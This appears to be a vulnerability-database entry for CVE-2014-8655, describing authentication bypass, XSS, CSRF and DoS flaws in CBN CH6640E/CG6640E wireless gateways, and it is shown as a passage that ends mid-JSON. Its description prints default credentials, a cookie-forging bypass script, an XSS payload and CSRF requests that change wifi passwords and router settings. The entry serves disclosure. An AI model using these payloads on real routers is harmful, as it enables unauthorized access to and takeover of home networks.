Vulnerability-Lookup

CVE-2014-8655 (GCVE-0-2014-8655)

Vulnerability from cvelistv5 – Published: 2014-11-06 15:00 – Updated: 2024-08-06 13:26

Summary

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

VAR-201411-0178

Vulnerability from variot - Updated: 2025-04-13 23:14

The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml. (1) xml/ of CmgwWirelessSecurity.xml (2) xml/ of DocsisConfigFile.xml (3) xml/ of CmgwBasicSetup.xml (4) basicDDNS.html (5) basicLanUsers.html (6) rootDesc.xml. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Cg6640e Wireless Gateway is prone to a information disclosure vulnerability. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0

Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.

Default credentials:

admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information.

document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";

Denial of Service (DoS) for all WiFi connected clients (disconnect)

GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1

Stored Cross-Site Scripting (XSS) Vulnerability

Cookie: userData Value: hax0r">alert(document.cookie);

document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";

Cross-Site Request Forgery (CSRF) Vulnerability

DDNS config:

GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1

Change wifi pass:

GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1

Add static mac address (static assigned dhcp client):

GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1

Enable/Disable UPnP:

GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201411-0178",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "cg6640e wireless gateway",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "compal broadband",
        "version": "1.0"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "compal broadband",
        "version": "ch6640-3.5.11.7-nosh"
      },
      {
        "model": "ch664oe wireless gateway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "compal broadband",
        "version": "1.0"
      },
      {
        "model": "ch6640e wireless gateway",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "compal broadband",
        "version": "1.0"
      },
      {
        "model": "networks",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "compal broadband",
        "version": "ch6640-3.5.11.7-nosh"
      },
      {
        "model": "broadband networks inc cg6640e wireless gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "compal",
        "version": "1.0"
      },
      {
        "model": "broadband networks inc ch6640e wireless gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "compal",
        "version": "1.0"
      },
      {
        "model": "broadband networks ch6640-3.5.11.7-nosh",
        "scope": null,
        "trust": 0.3,
        "vendor": "compal",
        "version": null
      },
      {
        "model": "broadband networks ch664oe wireless gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "compal",
        "version": "1.0"
      },
      {
        "model": "broadband networks cg6640e wireless gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "compal",
        "version": "1.0"
      },
      {
        "model": "ch",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "compal broadband cbn",
        "version": "model: ch6640 and ch6640e"
      },
      {
        "model": "ch",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "compal broadband cbn",
        "version": "hardware version: 1.0"
      },
      {
        "model": "ch",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "compal broadband cbn",
        "version": "firmware version: ch6640-3.5.11.7-nosh"
      },
      {
        "model": "ch",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "compal broadband cbn",
        "version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
      },
      {
        "model": "ch",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "compal broadband cbn",
        "version": "docsis mode: docsis 3.0"
      }
    ],
    "sources": [
      {
        "db": "ZSL",
        "id": "ZSL-2014-5203"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-07893"
      },
      {
        "db": "BID",
        "id": "77769"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201411-190"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-8655"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "77769"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-8655",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2014-8655",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2014-07893",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-76600",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2014-8655",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2014-8655",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2014-07893",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201411-190",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "ZSL",
            "id": "ZSL-2014-5203",
            "trust": 0.1,
            "value": "(3/5)"
          },
          {
            "author": "VULHUB",
            "id": "VHN-76600",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "ZSL",
        "id": "ZSL-2014-5203"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-07893"
      },
      {
        "db": "VULHUB",
        "id": "VHN-76600"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201411-190"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-8655"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml. (1) xml/ of CmgwWirelessSecurity.xml (2) xml/ of DocsisConfigFile.xml (3) xml/ of CmgwBasicSetup.xml (4) basicDDNS.html (5) basicLanUsers.html (6) rootDesc.xml. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Cg6640e Wireless Gateway is prone to a information disclosure vulnerability. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n                  Hardware version: 1.0\n                  Firmware version: CH6640-3.5.11.7-NOSH\n                  Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n                  DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n                configuration information. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-8655"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-07893"
      },
      {
        "db": "BID",
        "id": "77769"
      },
      {
        "db": "ZSL",
        "id": "ZSL-2014-5203"
      },
      {
        "db": "VULHUB",
        "id": "VHN-76600"
      },
      {
        "db": "PACKETSTORM",
        "id": "128860"
      }
    ],
    "trust": 2.7
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
        "trust": 0.1,
        "type": "poc"
      },
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-76600",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "ZSL",
        "id": "ZSL-2014-5203"
      },
      {
        "db": "VULHUB",
        "id": "VHN-76600"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-8655",
        "trust": 3.5
      },
      {
        "db": "EXPLOIT-DB",
        "id": "35075",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "70762",
        "trust": 2.7
      },
      {
        "db": "PACKETSTORM",
        "id": "128860",
        "trust": 1.9
      },
      {
        "db": "OSVDB",
        "id": "113837",
        "trust": 1.8
      },
      {
        "db": "XF",
        "id": "98331",
        "trust": 0.9
      },
      {
        "db": "ZSL",
        "id": "ZSL-2014-5203",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201411-190",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-07893",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "77769",
        "trust": 0.4
      },
      {
        "db": "XF",
        "id": "98328",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "98329",
        "trust": 0.1
      },
      {
        "db": "OSVDB",
        "id": "113843",
        "trust": 0.1
      },
      {
        "db": "OSVDB",
        "id": "113838",
        "trust": 0.1
      },
      {
        "db": "OSVDB",
        "id": "113836",
        "trust": 0.1
      },
      {
        "db": "OSVDB",
        "id": "113842",
        "trust": 0.1
      },
      {
        "db": "OSVDB",
        "id": "113841",
        "trust": 0.1
      },
      {
        "db": "OSVDB",
        "id": "113840",
        "trust": 0.1
      },
      {
        "db": "OSVDB",
        "id": "113839",
        "trust": 0.1
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2014100162",
        "trust": 0.1
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-87381",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-76600",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "ZSL",
        "id": "ZSL-2014-5203"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-07893"
      },
      {
        "db": "VULHUB",
        "id": "VHN-76600"
      },
      {
        "db": "BID",
        "id": "77769"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      },
      {
        "db": "PACKETSTORM",
        "id": "128860"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201411-190"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-8655"
      }
    ]
  },
  "id": "VAR-201411-0178",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-07893"
      },
      {
        "db": "VULHUB",
        "id": "VHN-76600"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-07893"
      }
    ]
  },
  "last_update_date": "2025-04-13T23:14:41.576000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.icbn.com.tw/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-76600"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-8655"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "http://www.securityfocus.com/bid/70762"
      },
      {
        "trust": 2.0,
        "url": "http://www.exploit-db.com/exploits/35075"
      },
      {
        "trust": 1.8,
        "url": "http://osvdb.org/show/osvdb/113837"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98331"
      },
      {
        "trust": 0.9,
        "url": "http://www.exploit-db.com/exploits/35075/"
      },
      {
        "trust": 0.9,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
      },
      {
        "trust": 0.9,
        "url": "http://xforce.iss.net/xforce/xfdb/98331"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8655"
      },
      {
        "trust": 0.7,
        "url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
      },
      {
        "trust": 0.1,
        "url": "http://cxsecurity.com/issue/wlb-2014100162"
      },
      {
        "trust": 0.1,
        "url": "http://osvdb.org/show/osvdb/113836"
      },
      {
        "trust": 0.1,
        "url": "http://osvdb.org/show/osvdb/113838"
      },
      {
        "trust": 0.1,
        "url": "http://osvdb.org/show/osvdb/113839"
      },
      {
        "trust": 0.1,
        "url": "http://osvdb.org/show/osvdb/113840"
      },
      {
        "trust": 0.1,
        "url": "http://osvdb.org/show/osvdb/113841"
      },
      {
        "trust": 0.1,
        "url": "http://osvdb.org/show/osvdb/113842"
      },
      {
        "trust": 0.1,
        "url": "http://osvdb.org/show/osvdb/113843"
      },
      {
        "trust": 0.1,
        "url": "http://packetstormsecurity.com/files/128860"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/xforce/xfdb/98328"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/xforce/xfdb/98329"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
      },
      {
        "trust": 0.1,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
      },
      {
        "trust": 0.1,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
      },
      {
        "trust": 0.1,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
      },
      {
        "trust": 0.1,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/basiclanusers.html"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/xml/docsisconfigfile.xml"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1:5000/rootdesc.xml"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/basicddns.html"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/wirelesschannelstatus.html"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
      },
      {
        "trust": 0.1,
        "url": "http://www.icbn.com.tw"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
      }
    ],
    "sources": [
      {
        "db": "ZSL",
        "id": "ZSL-2014-5203"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-07893"
      },
      {
        "db": "VULHUB",
        "id": "VHN-76600"
      },
      {
        "db": "BID",
        "id": "77769"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      },
      {
        "db": "PACKETSTORM",
        "id": "128860"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201411-190"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-8655"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "ZSL",
        "id": "ZSL-2014-5203"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-07893"
      },
      {
        "db": "VULHUB",
        "id": "VHN-76600"
      },
      {
        "db": "BID",
        "id": "77769"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      },
      {
        "db": "PACKETSTORM",
        "id": "128860"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201411-190"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-8655"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-10-25T00:00:00",
        "db": "ZSL",
        "id": "ZSL-2014-5203"
      },
      {
        "date": "2014-11-04T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-07893"
      },
      {
        "date": "2014-11-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-76600"
      },
      {
        "date": "2014-11-06T00:00:00",
        "db": "BID",
        "id": "77769"
      },
      {
        "date": "2014-11-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      },
      {
        "date": "2014-10-28T00:59:24",
        "db": "PACKETSTORM",
        "id": "128860"
      },
      {
        "date": "2014-11-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201411-190"
      },
      {
        "date": "2014-11-06T15:55:10.850000",
        "db": "NVD",
        "id": "CVE-2014-8655"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-11-07T00:00:00",
        "db": "ZSL",
        "id": "ZSL-2014-5203"
      },
      {
        "date": "2014-11-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-07893"
      },
      {
        "date": "2017-09-08T00:00:00",
        "db": "VULHUB",
        "id": "VHN-76600"
      },
      {
        "date": "2014-11-06T00:00:00",
        "db": "BID",
        "id": "77769"
      },
      {
        "date": "2014-11-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      },
      {
        "date": "2014-11-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201411-190"
      },
      {
        "date": "2025-04-12T10:46:40.837000",
        "db": "NVD",
        "id": "CVE-2014-8655"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
